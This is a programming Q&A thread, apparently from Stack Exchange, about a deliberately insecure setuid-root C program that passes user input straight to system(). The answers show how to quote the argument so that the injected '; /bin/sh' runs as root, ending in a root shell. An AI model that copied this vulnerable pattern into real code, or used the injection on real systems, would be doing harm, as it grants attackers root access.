# Privilege Escalation: C functions setuid(0) with system() not working in Linux

Tags: linux, c, shellcode, privilege-escalation

Quick disclaimer: I **fully** understand that the code I am attempting to write is insecure, and allows for arbitrary users to escalate to root. I am writing a simple C program like this to demonstrate how privileged escalation works to those unfamiliar.

What I have right now is a simple C program:

```
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int BUFFERSIZE = 512;

void main(int argc, char** argv) {
  char ipaddr[BUFFERSIZE];
  snprintf(ipaddr, BUFFERSIZE, "ping -c 4 %s", argv[1]);
  if(setuid(0) == -1) printf("setUID ERROR");
  system(ipaddr);
}
```

I compile this code as root and set the permissions as such:

```
-rwsr-xr-x 1 root root 16840 Oct 28 14:13 pingSys
```

As you can see, the setUID bit is flipped. So what **should** happen, is if I run the program like so:

```
./pingSys 127.0.0.1; /bin/sh
```

It should execute `ping -c 4 127.0.0.1; /bin/sh` as the root user and spawn a shell. But instead, I get this:

```
user@localhost:~/privEsc$ ./pingSys 127.0.0.1; /bin/sh
PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.034 ms
64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.089 ms
64 bytes from 127.0.0.1: icmp_seq=3 ttl=64 time=0.118 ms
64 bytes from 127.0.0.1: icmp_seq=4 ttl=64 time=0.089 ms

--- 127.0.0.1 ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 59ms
rtt min/avg/max/mdev = 0.034/0.082/0.118/0.031 ms
$ whoami
user
```

What is going wrong here? I have the setUID bit flipped on the executable, and I even tried running the function `setuid(0)`, which doesn't throw an error. I'm very confused as to why I can't spawn a shell as root because everywhere else I've looked this has worked.

Any ideas?

Answer (score 4, accepted):

```
./pingSys 127.0.0.1; /bin/sh
```

The semicolon will be interpreted as a command delimiter by the current shell. This means it will first execute `./pingSys 127.0.0.1` in the current shell and then `/bin/sh` in the current shell, i.e. spawning a new shell with the current (non-privileged) permissions.

What you instead need to do is to put quotes around your argument so that it gets passed in full to your `pingSys` program instead of getting interpreted by the current shell:

```
 $ ./pingSys '127.0.0.1; /bin/sh'
PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.071 ms
...
# whoami
root
```

Comment: *Slams head on table* ...It's always the small things that slip past.

Answer (score 4):

So, because you haven't quoted the parameter, you are passing two separate commands to your non-elevated shell. One of them runs as root, and calls `ping`. The other runs as user and spawns a sub-shell. Your command is equivalent to this:

```
$ ./pingSys 127.0.0.1
$ /bin/sh
```

The first line runs as root, the second as the current user. Quoting the full parameter should make it work like you expect.